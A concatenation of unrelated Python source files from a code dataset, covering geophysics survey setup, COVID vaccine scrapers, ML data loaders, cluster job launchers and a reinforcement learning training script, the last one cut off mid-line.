self._nD_vec.append(self.time[ii].size)\n elif moment_type == 'dual':\n self._nD_vec.append(\n self.time[ii].size+self.time_dual_moment[ii].size\n )\n else:\n raise Exception(\"moment_type must be either signle or dual\")\n self._nD_vec = np.array(self._nD_vec)\n return self._nD_vec\n\n @property\n def data_index(self):\n # Need to generalize this for the dual moment data\n if getattr(self, '_data_index', None) is None:\n self._data_index = [\n np.arange(self.nD_vec[i_sounding])+np.sum(self.nD_vec[:i_sounding]) for i_sounding in range(self.n_sounding)\n ]\n return self._data_index\n\n @property\n def nD(self):\n # Need to generalize this for the dual moment data\n if getattr(self, '_nD', None) is None:\n self._nD = self.nD_vec.sum()\n return self._nD\n\n\ndef get_skytem_survey(\n topo,\n src_locations,\n rx_locations,\n time,\n time_input_currents,\n input_currents,\n base_frequency=25,\n src_type=\"VMD\",\n rx_type=\"dBzdt\",\n moment_type=\"dual\",\n time_dual_moment=None,\n time_input_currents_dual_moment=None,\n input_currents_dual_moment=None,\n base_frequency_dual_moment=210,\n wave_type=\"general\",\n field_type=\"secondary\",\n\n):\n\n n_sounding = src_locations.shape[0]\n time_list = [time for i in range(n_sounding)]\n time_dual_moment_list = [time_dual_moment for i in range(n_sounding)]\n src_type_array = np.array([src_type], dtype=str).repeat(n_sounding)\n rx_type_array = np.array([rx_type], dtype=str).repeat(n_sounding)\n 
wave_type_array = np.array([wave_type], dtype=str).repeat(n_sounding)\n field_type_array = np.array([field_type], dtype=str).repeat(n_sounding)\n input_currents_list=[input_currents for i in range(n_sounding)]\n time_input_currents_list=[time_input_currents for i in range(n_sounding)]\n base_frequency_array = np.array([base_frequency]).repeat(n_sounding)\n input_currents_dual_moment_list =[input_currents_dual_moment for i in range(n_sounding)]\n time_input_currents_dual_moment_list =[time_input_currents_dual_moment for i in range(n_sounding)]\n base_frequency_dual_moment_list = np.array([base_frequency_dual_moment]).repeat(n_sounding)\n moment_type_array = np.array([moment_type], dtype=str).repeat(n_sounding)\n\n survey = GlobalAEMSurveyTD(\n topo = topo,\n src_locations = src_locations,\n rx_locations = rx_locations,\n src_type = src_type_array,\n rx_type = rx_type_array,\n field_type = field_type,\n time = time_list,\n wave_type = wave_type_array,\n moment_type = moment_type_array,\n time_input_currents = time_input_currents_list,\n input_currents = input_currents_list,\n base_frequency = base_frequency_array,\n time_dual_moment = time_dual_moment_list,\n time_input_currents_dual_moment = time_input_currents_dual_moment_list,\n input_currents_dual_moment = input_currents_dual_moment_list,\n base_frequency_dual_moment = base_frequency_dual_moment_list,\n )\n\n return survey\n","sub_path":"notebook/toSherlockAEM/simpegskytem/Survey.py","file_name":"Survey.py","file_ext":"py","file_size_in_byte":8644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"576393274","text":"import camelot\nimport pandas as pd\nimport us\n\nfrom can_tools.scrapers import variables\nfrom can_tools.scrapers.base import CMU\nfrom can_tools.scrapers.official.base import StateDashboard, TableauDashboard\n\n\nclass NoTableauMapFiltersFoundError(Exception):\n \"\"\"Raised if no Tableau Map Filters are found.\"\"\"\n\n\nclass ArizonaVaccineCounty(TableauDashboard):\n \"\"\"\n Fetch county level covid data from Arizona's Tableau dashboard\n \"\"\"\n\n baseurl = \"https://tableau.azdhs.gov\"\n viewPath = \"VaccineDashboard/Vaccineadministrationdata\"\n\n # Initlze\n source = \"https://www.azdhs.gov/preparedness/epidemiology-disease-control/infectious-disease-epidemiology/covid-19/dashboards/index.php\"\n source_name = \"Arizona Department Of Health Services\"\n has_location = False\n location_type = \"county\"\n state_fips = int(us.states.lookup(\"Arizona\").fips)\n location_name_col = \"location_name\"\n timezone = \"US/Mountain\"\n\n filterFunctionName = (\n \"[federated.1rsrm840sp0wgc11a5yw61x1aht3].[Calculation_624592978064752643]~s0\"\n )\n counties = [\n [\"APACHE\", 4001],\n [\"COCHISE\", 4003],\n [\"COCONINO\", 4005],\n [\"GILA\", 4007],\n [\"GRAHAM\", 4009],\n [\"GREENLEE\", 4011],\n [\"LA PAZ\", 4012],\n [\"MARICOPA\", 4013],\n [\"MOHAVE\", 4015],\n [\"NAVAJO\", 4017],\n [\"PIMA\", 4019],\n [\"PINAL\", 4021],\n [\"SANTA CRUZ\", 4023],\n [\"YAVAPAI\", 4025],\n [\"YUMA\", 4027],\n ]\n\n cmus = {\n \"total_vaccine_initiated\": variables.INITIATING_VACCINATIONS_ALL,\n \"total_vaccine_completed\": variables.FULLY_VACCINATED_ALL,\n \"total_doses_administered\": variables.TOTAL_DOSES_ADMINISTERED_ALL,\n }\n\n def fetch(self):\n dfs = []\n for county_name, fips in self.counties:\n self.filterFunctionValue = county_name\n county_data = self.get_tableau_view()\n data = {\n \"total_doses_administered\": self._get_doses_administered(county_data),\n 
\"total_vaccine_initiated\": self._get_vaccines_initiated(county_data),\n \"total_vaccine_completed\": self._get_vaccines_completed(county_data),\n \"location\": fips,\n \"location_name\": county_name,\n }\n dfs.append(pd.DataFrame(data))\n\n # Concat the dfs\n output_df = pd.concat(dfs, axis=0, ignore_index=True)\n return output_df\n\n def _get_doses_administered(self, data):\n return data[\"Number of Doses\"][\"AGG(Number of Doses)-alias\"]\n\n def _get_vaccines_completed(self, data):\n return data[\"Complete Vaccine Series\"][\n \"AGG(Total number of people (LOD))-alias\"\n ]\n\n def _get_vaccines_initiated(self, data):\n return data[\" County using admin county\"][\"AGG(Number of People)-alias\"]\n\n\nclass ArizonaVaccineCountyAllocated(StateDashboard):\n \"\"\"\n Fetch county level Covid-19 vaccination data from official state of Arizona PDF\n \"\"\"\n\n source = \"https://directorsblog.health.azdhs.gov/covid-19-vaccine-surveillance/\"\n source_name = \"Arizona Department Of Health Services\"\n has_location = False\n location_type = \"county\"\n state_fips = int(us.states.lookup(\"Arizona\").fips)\n\n def fetch(self):\n # Set url of downloadable dataset\n url = \"https://azdhs.gov/documents/preparedness/epidemiology-disease-control/infectious-disease-epidemiology/novel-coronavirus/vaccine-phases.pdf\"\n\n return camelot.read_pdf(url, pages=\"2\", flavor=\"stream\")\n\n def normalize(self, data) -> pd.DataFrame:\n # adding values to this array will cause all rows where location_name is\n # in this array to be removed\n non_counties = [\"Tribes\"]\n # Sanity check how many tables we got back\n if len(data) > 1:\n raise ValueError(\"more tables returned than expected value\")\n\n # Read data into data frames\n df = data[0].df\n\n # Remove extra header and footer columns\n df = df.iloc[6:-7].reset_index(drop=True)\n\n # Use this if we want to include State PODs, Tribes, CDC Pharmacy Partnership, and ADHS\n # loc_replacer = {\"State PODs**\": \"State PODs\", \"ADHS‡\": \"ADHS\"}\n # df = df.replace({\"location_name\": loc_replacer})\n # df = df.drop([16, 18])\n # df.at[17, 0] = \"CDC Pharmacy Partnership\"\n\n # Rename column names\n df.columns = [\n \"location_name\",\n \"pfizer_vaccine_allocated_new_doses\",\n \"pfizer_vaccine_allocated\",\n \"moderna_vaccine_allocated_new_doses\",\n \"moderna_vaccine_allocated\",\n \"janssen_vaccine_new_doses\",\n \"janssen_vaccine_allocated\",\n \"total_vaccine_allocated\",\n ]\n\n # Determine what columns to keep\n cols_to_keep = [\n \"location_name\",\n \"pfizer_vaccine_allocated\",\n \"moderna_vaccine_allocated\",\n \"janssen_vaccine_allocated\",\n \"total_vaccine_allocated\",\n ]\n\n # Drop extraneous columns\n df = df.loc[:, cols_to_keep]\n\n # Create dictionary for columns to map\n crename = {\n \"moderna_vaccine_allocated\": CMU(\n category=\"moderna_vaccine_allocated\",\n measurement=\"cumulative\",\n unit=\"doses\",\n ),\n \"pfizer_vaccine_allocated\": CMU(\n category=\"pfizer_vaccine_allocated\",\n measurement=\"cumulative\",\n unit=\"doses\",\n ),\n \"janssen_vaccine_allocated\": CMU(\n category=\"janssen_vaccine_allocated\",\n measurement=\"cumulative\",\n unit=\"doses\",\n ),\n \"total_vaccine_allocated\": CMU(\n category=\"total_vaccine_allocated\",\n measurement=\"cumulative\",\n unit=\"doses\",\n ),\n }\n\n # Move things into long format\n df = df.melt(id_vars=[\"location_name\"], value_vars=crename.keys()).dropna()\n\n # Determine the category of each observation\n out = self.extract_CMU(df, crename)\n\n # Convert value columns, remove 
commas\n out.loc[:, \"value\"] = pd.to_numeric(out[\"value\"].str.replace(\",\", \"\"))\n\n # Add rows that don't change\n out[\"vintage\"] = self._retrieve_vintage()\n out[\"dt\"] = self._retrieve_dt(\"US/Arizona\")\n\n return out.query(\"location_name not in @non_counties\")\n","sub_path":"can_tools/scrapers/official/AZ/az_vaccine.py","file_name":"az_vaccine.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"319890611","text":"import logging\nlogging.basicConfig(filename='E:\\\\Python\\\\Naresh_ex\\\\NT1.txt',level=logging.INFO)\n\n\ndef add(fargs,*args):\n count=0 \n sum=0\n for i in args:\n sum=sum+i\n count+=1\n print(sum+fargs)\n str='Call is made to this function with',count+1\n logging.info(str)\nadd(1,2,3)\nadd(1,2)\nadd(1,2,3,4,5)\nadd(32,343,54,65,767,8)\nadd(1,2,3,4,5,6,7)\n'''import logging\nlogging.basicConfig(filename='mylog.txt',level=logging.CRITICAL)'''\n\nlogging.critical('There is a serious problem')\nlogging.error('This is a Error message')\nprint('Program execution is done')\n","sub_path":"logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"108386194","text":"import requests\nimport json\nimport os\nfrom gtts import gTTS\nfrom datetime import datetime\n\nparams = {'id':'test'}\nres = requests.post('http://52.79.133.253/demand.php', data=params)\ntext = res.text.encode('utf8')[3:].decode('utf8')\n\nnow = datetime.strptime(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), '%Y-%m-%d %H:%M:%S')\n\ndata = json.loads(text)\ntext = \"\"\n\nfor d in data:\n s_date = datetime.strptime(d['s_date'], '%Y-%m-%d %H:%M:%S')\n e_date = datetime.strptime(d['e_date'], '%Y-%m-%d %H:%M:%S')\n\n if (now > s_date) and (now < e_date):\n text = text + d['text'] + \" ″\"\n\ntts = gTTS(text=text, lang='ko')\ntts.save(\"input_test2.mp3\")\n\n\nos.system(\"input_test2.mp3\")","sub_path":"Python/dyrntkgkd.py","file_name":"dyrntkgkd.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"170933601","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),\n ('gender', models.CharField(verbose_name='性别', blank=True, null=True, max_length=1, choices=[('M', '女'), ('F', '男')])),\n ('phone', models.CharField(null=True, blank=True, max_length=15)),\n ('email', models.CharField(null=True, blank=True, max_length=30)),\n ('ukey', models.CharField(help_text='请输入15位ukey', blank=True, null=True, validators=[django.core.validators.RegexValidator(code='nomatch', regex='^.{15}$', message='ukey长度必须为15位')], max_length=15)),\n ('user', models.OneToOneField(blank=True, null=True, related_name='profile', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'abstract': False,\n },\n ),\n 
]\n","sub_path":"apps/customer/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"275601655","text":"# coding: utf-8\n\n\nimport requests\nfrom lxml import etree\nimport pandas as pd\n\n\nheaders = {\n 'Referer':'http://www.iqiyi.com/dianying/',\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n}\nresponse = requests.get('http://www.iqiyi.com/dianying_new/i_list_paihangbang.html',headers=headers).text\nhtml = etree.HTML(response)\nlis = html.xpath('//*[@id=\"widget-tab-0\"]/div[2]/div/div[1]/ul/li[1]')\n# print(lis)\n\ntitle = li.xpath('//div[@class=\"title\"]/p/a/text()')\nlink = li.xpath('//div[@class=\"title\"]/p/a/@href')\nscore_front = li.xpath('//span[@class=\"score\"]/strong/text()')\nscore_back = li.xpath('//span[@class=\"score\"]/text()')\nscore = [str(i)+str(j) for i, j in zip(score_front,score_back)]\ndescribe = li.xpath('//p[@class=\"site-piclist_info_describe\"]/text()')\ndata = {\n 'title':title,\n 'link':link,\n 'score':score,\n 'describe':describe,\n}\n\nfor i in field():\n# print(i)\n df = pd.DataFrame(i)\ndf.to_csv(\"d:\\\\desktop\\\\data.csv\")\n\n","sub_path":"aiqiyi_movies_sort.py","file_name":"aiqiyi_movies_sort.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"159057018","text":"\"\"\"\nInput Output tools for training and testing ResNet model on CIFAR100 and TinyImageNet\n\n@author: Payam Dibaeinia\n\"\"\"\nimport torchvision.transforms as transforms\nimport torchvision\nimport torch\nfrom torchvision import datasets\nimport os\n\ndef build_CIFAR100_DataLoader(data_path, train_batch_size, test_batch_size, num_workers):\n train_aug = transforms.Compose([\n transforms.RandomCrop(32, padding = 4),\n transforms.RandomHorizontalFlip(p=0.2),\n transforms.ToTensor(),\n # I followed the normalization values used in the below code:\n # https://github.com/meliketoy/wide-resnet.pytorch/blob/master/config.py\n transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)),\n ])\n\n test_aug = transforms.Compose([\n transforms.ToTensor(),\n # I followed the normalization values used in the below code:\n # https://github.com/meliketoy/wide-resnet.pytorch/blob/master/config.py\n transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)),\n ])\n\n trainset = torchvision.datasets.CIFAR100(root=data_path, train=True, download=False, transform=train_aug)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size, shuffle=True, num_workers=num_workers)\n\n testset = torchvision.datasets.CIFAR100(root=data_path, train=False,download=False, transform=test_aug)\n testloader = torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False, num_workers=num_workers)\n\n return trainloader, testloader\n\ndef build_TinyImageNet_DataLoader(train_path, val_path, train_batch_size, val_batch_size, num_workers):\n\n def create_val_folder(val_dir):\n \"\"\"\n This method is responsible for separating validation\n images into separate sub folders\n \"\"\"\n # path where validation data is present now\n path = os.path.join(val_dir, 'images')\n # file where image2class mapping is present\n filename = os.path.join(val_dir, 'val_annotations.txt')\n fp = open(filename, \"r\") # open file in read mode\n data = 
fp.readlines() # read line by line\n '''\n Create a dictionary with image names as key and\n corresponding classes as values\n '''\n val_img_dict = {}\n for line in data:\n words = line.split(\"\\t\")\n val_img_dict[words[0]] = words[1]\n fp.close()\n # Create folder if not present, and move image into proper folder\n for img, folder in val_img_dict.items():\n newpath = (os.path.join(path, folder))\n if not os.path.exists(newpath): # check if folder exists\n os.makedirs(newpath)\n # Check if image exists in default directory\n if os.path.exists(os.path.join(path, img)):\n os.rename(os.path.join(path, img), os.path.join(newpath, img))\n return\n\n\n train_aug = transforms.Compose([\n transforms.RandomCrop(64, padding = 4),\n transforms.ToTensor(),\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n val_aug = transforms.Compose([\n transforms.ToTensor(),\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n\n train_dataset = datasets.ImageFolder(train_path, transform = train_aug)\n trainloader = torch.utils.data.DataLoader(train_dataset, batch_size=train_batch_size, shuffle=True, num_workers=num_workers)\n\n if 'val_' in os.listdir(val_path)[0]:\n create_val_folder(val_path)\n else:\n pass\n\n val_dataset = datasets.ImageFolder(val_path, transform = val_aug)\n valloader = torch.utils.data.DataLoader(val_dataset, batch_size=val_batch_size, shuffle=False, num_workers=num_workers)\n\n return trainloader, valloader\n","sub_path":"DeepResidualNN/IOtools.py","file_name":"IOtools.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"13265797","text":"class Bug(object):\n def __init__(\n self,\n bug_id,\n product,\n bug_severity,\n priority,\n component,\n description\n ):\n self.bug_id = bug_id\n self.product = product\n self.bug_severity = bug_severity\n self.priority = priority\n self.component = component\n self.description = description\n\n\nclass TfidfBug(Bug):\n def __init__(\n self,\n bug_id,\n product,\n bug_severity,\n priority,\n component,\n description,\n description_tfidf\n ):\n super().__init__(bug_id, product, bug_severity, priority, component, description)\n self.description_tfidf = description_tfidf\n\n\nclass VectorizedBug(Bug):\n def __init__(\n self,\n bug_id,\n product,\n bug_severity,\n priority,\n component,\n description,\n product_ohe,\n bug_severity_ohe,\n priority_ohe,\n component_ohe,\n description_tfidf\n ):\n super().__init__(bug_id, product, bug_severity, priority, component, description)\n self.product_ohe = product_ohe\n self.bug_severity_ohe = bug_severity_ohe\n self.priority_ohe = priority_ohe\n self.component_ohe = component_ohe\n self.description_tfidf = description_tfidf\n","sub_path":"app/models/bugs.py","file_name":"bugs.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"70104299","text":"class Solution(object):\n def combinationSum4(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n \n dp = [0] * (target + 1)\n dp[0] = 1\n nums.sort()\n \n for i in range(target+1):\n for num in nums:\n if num > i:\n break\n if num == i:\n dp[i] += 1\n if num < i:\n # for each num in nums, take the current index - nums and add that\n # this will be changed x times where x in the number of numbers in nums\n # dp[i] is a sum of len(num) instances\n dp[i] += dp[i-num]\n \n return dp[target]\n \n # if there are 3 
nums, then the result is a sum of 3 numbers\n # if there are 4 nums, then the result is a sum of 4 numbers\n # (assuming the target also isn't in nums then it's just +1)\n \n ","sub_path":"lc/377.py","file_name":"377.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"313407121","text":"# coding: UTF-8\nimport urllib2\nimport json\nimport time\n\n# 天気予報ページのヘッダを設定\ncontents = u\"\"\"\n\n\n\n天気予報\n\n\"\"\"\n\n# Weather Hacksからデータ読み込み\nweather_path = "http://weather.livedoor.com/forecast/webservice/json/v1?city=130010"\ntime.sleep(1) # 読み込み失敗防止のため、Wait処理を掛ける\nresp = urllib2.urlopen(weather_path).read()\n\n# 読み込んだJSONデータをディクショナリ型に変換\nresp = json.loads(resp)\n\n# respデータから天気予報ページの中身を作成\ncontents += \"\"\"\n\n
%s\n\n\n%s\n\n\"\"\" % (resp['title'], resp['description']['text'])\n\nfor forecast in resp['forecasts']:\n contents += \"%s (%s) : %s
\\n\" % (forecast['dateLabel'], forecast['date'], forecast['telop'])\n\ncontents += \"\"\"\n\n\n\"\"\"\n\n# print contents # ファイルに書き込む文字列の内容を確認できます\n\n# 天気予報ページをweather.htmlに出力\nf = open('weather.html', 'w') # weather.htmlファイルを書き込みモードで開く\ntext = contents.encode('utf_8')\nf.write(text)\nf.close()\n","sub_path":"sample/ex02webAPI/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"221234640","text":"import subprocess\nimport os\nimport sys\nimport re\nfrom datetime import datetime\nimport time\ntry:\n from db_tools import dbapis, query_tools\n import db_process_upload\n import maternal_fns\nexcept:\n sys.path.append(str(os.getcwd()).rstrip('/mmr'))\n from db_tools import dbapis, query_tools\n import db_process_upload\n import maternal_fns\n\nenginer = dbapis.engine_factory()\nquery = ('SELECT cause_id FROM shared.cause_hierarchy_history '\n 'WHERE cause_set_id = 8 AND cause_set_version_id = '\n '(SELECT cause_set_version_id FROM shared.cause_set_version '\n 'WHERE cause_set_id = 8 and end_date IS NULL)')\ncauses = (query_tools.query_2_df(query, engine=enginer.engines[\"cod_prod\"])\n ['cause_id'].tolist())\n\n# set out directory\ndate_regex = re.compile('\\W')\ndate_unformatted = str(datetime.now())[0:13]\ndate_str = date_regex.sub('_', date_unformatted)\nout_dir = '/ihme/centralcomp/maternal_mortality/mmr/%s' % date_str\narc_out_dir = '%s/multi_year' % out_dir\nmmr_out_dir = '%s/single_year' % out_dir\nif not os.path.exists('%s' % out_dir):\n os.makedirs('%s' % out_dir)\nif not os.path.exists('%s' % arc_out_dir):\n os.makedirs('%s' % arc_out_dir)\nif not os.path.exists('%s' % mmr_out_dir):\n os.makedirs('%s' % mmr_out_dir)\n\nenv = 'gbd_prod'\nproc_json = db_process_upload.create_tables(env)\njson = proc_json.loc[0, 'v_return_string']\nprocess_v = int(json.split()[2].replace('\"', \"\").replace(\",\", \"\"))\nyearvals = range(1990, 2016)\n\nfor year in yearvals:\n for cause in causes:\n call = ('qsub -cwd -P proj_custom_models -N \"part1_%s_%s\" -l '\n 'mem_free=40G -pe multi_slot 20 -o '\n '/share/temp/sgeoutput/maternal '\n '-e /share/temp/sgeoutput/maternal cluster_shell.sh '\n 'mmr/01_calculate_MMR_from_draws.py \"%s\" \"%s\" \"%s\" \"%s\"'\n % (cause, year, cause, year, process_v, mmr_out_dir))\n subprocess.call(call, shell=True)\n\nmaternal_fns.wait('part1', 300)\n\nfor cause in causes:\n call = ('qsub -cwd -P proj_custom_models -N \"part2_%s\" -l '\n 'mem_free=40G -pe multi_slot 20 -o /share/temp/sgeoutput/maternal '\n '-e /share/temp/sgeoutput/maternal cluster_shell.sh '\n 'mmr/02_calculate_ARC_from_MMR.py \"%s\" \"%s\"'\n % (cause, cause, arc_out_dir))\n subprocess.call(call, shell=True)\n\nmaternal_fns.wait('part2', 300)\n\nupload_types = ['single', 'multi']\nfor u_type in upload_types:\n if u_type == 'single':\n in_dir = mmr_out_dir\n else:\n in_dir = arc_out_dir\n call = ('qsub -cwd -P proj_custom_models -N \"part3_%s\" -l mem_free=10G '\n '-pe multi_slot 5 -o /share/temp/sgeoutput/maternal '\n '-e /share/temp/sgeoutput/maternal cluster_shell.sh '\n 'mmr/03_upload.py \"%s\" \"%s\" \"%s\" \"%s\"'\n % (u_type, u_type, process_v, env, in_dir))\n subprocess.call(call, shell=True)\n time.sleep(5)\n\n","sub_path":"maternal/fatal/mmr/00_MMR_master.py","file_name":"00_MMR_master.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"561461184","text":"import 
os\nimport yaml\nimport numpy as np\nfrom .operators import get_best_individual\nfrom scipy.optimize import OptimizeResult\n\ndef load_config(path='config.yaml'):\n with open(path) as fp:\n config = yaml.load(fp)\n return config\n\n\ndef get_optimization_results(\n t,\n population,\n factorial_cost,\n scalar_fitness,\n skill_factor,\n pairs=None,\n tasks=None):\n K = len(set(skill_factor))\n N = len(population) // 2\n results = []\n for k in range(K):\n result = OptimizeResult()\n x, fun = get_best_individual(\n population, factorial_cost, scalar_fitness, skill_factor, k)\n result.x = x\n result.fun = fun\n result.nit = t\n result.nfev = (t + 1) * N\n if pairs is not None:\n result.pair = pairs[k, :]\n else:\n result.pair = None\n if tasks is not None:\n result.ucb_value = tasks[k].ucb_solver.value\n else:\n result.ucb_value = None\n results.append(result)\n return results\n\nROOT = '../../result'\n\ndef create_result_folder(args):\n # folder for root\n if not os.path.exists(ROOT):\n os.mkdir(ROOT)\n # folder for benchmark\n folder = os.path.join(ROOT, '{}'.format(args.benchmark_id))\n if not os.path.exists(folder):\n os.mkdir(folder)\n # folder for algorithm\n folder = os.path.join(folder, '{}_{:0.1f}'.format(args.algorithm.__name__, args.rmp))\n if not os.path.exists(folder):\n os.mkdir(folder)\n return folder\n\ndef save(Results, args):\n folder = create_result_folder(args)\n path = os.path.join(folder, 'fitness-{}.npy'.format(args.seed))\n X = np.array([[res.fun for res in results] for results in Results])\n np.save(path, X)\n\n path = os.path.join(folder, 'pair-selection-{}.npy'.format(args.seed))\n X = np.array([[res.pair for res in results] for results in Results])\n np.save(path, X)\n\n path = os.path.join(folder, 'ucb-value-{}.npy'.format(args.seed))\n X = np.array([[res.ucb_value for res in results] for results in Results])\n np.save(path, X)\n","sub_path":"code/ma2bea/optimizer/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"485654941","text":"\nimport numpy as np\nfrom ndp.arguments import *\nimport copy\nimport glob\nimport os\nimport time\nfrom collections import deque\nfrom datetime import datetime\nimport torch.nn.functional as F\nimport gym\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport tensorflow as tf\n\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr import algo, utils\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr.envs import make_vec_envs\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr.model import Policy, DMPPolicy\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr.storage import RolloutStorage, RolloutStorageDMP\nfrom ndp.pytorch_a2c_ppo_acktr_gail.ppo_train import train as train_ppo\nfrom ndp.pytorch_a2c_ppo_acktr_gail.dmp_train import train as train_dmp\nfrom ndp.pytorch_a2c_ppo_acktr_gail.a2c_ppo_acktr.algo.ppo import PPODMP\n\nfrom rlkit.core import logger as rlkit_logger\nfrom rlkit.core.eval_util import create_stats_ordered_dict\n\ndef dmp_experiment(variant):\n env_name = variant[\"env_name\"]\n env_suite = variant[\"env_suite\"]\n env_kwargs = variant[\"env_kwargs\"]\n seed = variant[\"seed\"]\n\n log_dir = os.path.expanduser(rlkit_logger.get_snapshot_dir())\n utils.cleanup_log_dir(log_dir)\n\n device = torch.device(\"cpu\")\n\n torch.backends.cudnn.benchmark = True\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n 
torch.set_num_threads(1)\n\n envs = make_vec_envs(\n env_suite,\n env_name,\n env_kwargs,\n seed,\n variant[\"num_processes\"],\n variant[\"rollout_kwargs\"][\"gamma\"],\n rlkit_logger.get_snapshot_dir(),\n device,\n False,\n )\n\n test_envs = make_vec_envs(\n env_suite,\n env_name,\n env_kwargs,\n seed,\n 5,\n None,\n rlkit_logger.get_snapshot_dir(),\n device,\n False,\n )\n\n dmp_kwargs = variant['dmp_kwargs']\n dmp_kwargs['l'] = variant['num_int_steps'] // dmp_kwargs['T'] + 1\n\n actor_critic = DMPPolicy(\n envs.observation_space.shape,\n envs.action_space,\n base_kwargs=dmp_kwargs,\n )\n actor_critic.to(device)\n\n agent = PPODMP(actor_critic, **variant[\"algorithm_kwargs\"])\n\n rollouts = RolloutStorageDMP(\n variant[\"num_steps\"],\n variant[\"num_processes\"],\n envs.observation_space.shape,\n envs.action_space,\n actor_critic.recurrent_hidden_state_size,\n T=dmp_kwargs['T'],\n )\n\n train_dmp(actor_critic, agent, rollouts, envs, test_envs, device, variant)\n\n\ndef ppo_experiment(args):\n\n\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed_all(args.seed)\n device = torch.device(\"cuda:0\" if args.cuda else \"cpu\")\n\n\n if args.cuda and torch.cuda.is_available() and args.cuda_deterministic:\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n env_kwargs = dict()\n\n env_kwargs['timestep'] = args.timestep\n\n if \"push\" in args.env_name:\n env_kwargs['params'] = 'random_goal_unconstrained'\n\n if \"soccer\" in args.env_name:\n env_kwargs['params'] = 'random_goal_unconstrained'\n\n if \"faucet\" in args.env_name:\n secondary_output = True\n\n env_kwargs=dict(\n dense=False,\n image_obs=False,\n action_scale=1,\n control_mode=\"end_effector\",\n frame_skip=40,\n target_mode=False,\n usage_kwargs=dict(\n use_dm_backend=True,\n use_raw_action_wrappers=False,\n use_image_obs=False,\n max_path_length=280,\n ),\n image_kwargs=dict(),\n )\n env_name = \"kettle\"\n test_envs = make_vec_envs(\n 'kitchen',\n env_name,\n env_kwargs,\n args.seed,\n 5,\n None,\n args.log_dir,\n device,\n False,\n )\n envs = make_vec_envs(\n 'kitchen',\n env_name,\n env_kwargs,\n args.seed,\n args.num_processes,\n args.gamma,\n args.log_dir,\n device,\n False,\n )\n\n\n # envs = make_vec_envs(args.env_name, args.seed, args.num_processes,\n # args.gamma, args.log_dir, device, False, env_kwargs=env_kwargs)\n\n # test_envs = make_vec_envs(args.env_name, args.seed + args.num_processes, args.num_processes,\n # None, args.log_dir, device, False, env_kwargs=env_kwargs)\n\n actor_critic = Policy(\n envs.observation_space.shape,\n envs.action_space,\n base_kwargs={'recurrent': args.recurrent_policy, 'hidden_size':args.hidden_size, 'hidden_activation':'relu'})\n actor_critic.to(device)\n\n agent = algo.PPO(\n actor_critic,\n args.clip_param,\n args.ppo_epoch,\n args.num_mini_batch,\n args.value_loss_coef,\n args.entropy_coef,\n lr=args.lr,\n eps=args.eps,\n max_grad_norm=args.max_grad_norm)\n\n\n\n rollouts = RolloutStorage(args.num_steps, args.num_processes,\n envs.observation_space.shape, envs.action_space,\n actor_critic.recurrent_hidden_state_size)\n\n train_ppo(actor_critic, agent, rollouts, envs, test_envs, args)\n\nif __name__ == '__main__':\n args = get_args_ppo()\n full_path = os.path.realpath(__file__)\n path, filename = os.path.split(full_path)\n exp_id = args.expID\n if args.name:\n args.save_dir = path + 